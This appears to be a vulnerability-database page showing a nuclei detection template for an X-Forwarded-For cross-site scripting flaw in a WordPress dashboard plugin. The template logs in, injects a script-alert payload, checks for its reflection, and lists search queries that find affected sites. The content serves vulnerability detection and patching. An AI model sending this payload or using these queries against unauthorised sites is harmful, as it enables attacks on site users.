Lucene search
K

System Dashboard < 2.8.10 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

Vulnerability in System Dashboard plugin < 2.8.10 allows Cross-Site Scripting via header injection.

Related
Refs
Code
id: CVE-2023-7246

info:
  name: System Dashboard < 2.8.10 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The System Dashboard WordPress plugin before 2.8.10 does not sanitize and escape some parameters, which could allow administrators in multisite WordPress configurations to perform Cross-Site Scripting attacks through header injection, specifically in the X-Forwarded-For header.
  impact: |
    Authenticated administrators in multisite WordPress configurations can inject malicious JavaScript through X-Forwarded-For header to execute attacks against other WordPress users.
  remediation: |
    Update the System Dashboard plugin to version 2.8.10 or later.
  reference:
    - https://wpscan.com/vulnerability/7413d5ec-10a7-4cb8-ac1c-4ef554751518/
    - https://research.cleantalk.org/cve-2023-7246/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-7246
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-7246
    cwe-id: CWE-79
    epss-score: 0.00813
    epss-percentile: 0.52545
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="wp-content/plugins/system-dashboard/"
    google-query: inurl:"/wp-content/plugins/system-dashboard/"
    shodan-query: html:"wp-content/plugins/system-dashboard/"
  tags: cve,cve2023,wp,wordpress,xss,wp-plugin,authenticated,system-dashboard,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/index.php?page=system-dashboard HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 0.0.0.0<script>alert(document.domain)</script>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "Your IP</strong>"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402205139e54e27c34a8fa5c8a445257e53ef2c1619616bfff8bbebffe960ba3c1f1f0220267106127026516aa4044216934cbdbe1ab9d73cd3b543115bbaf24dc7f2b08e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.4
EPSS0.00813
SSVC
17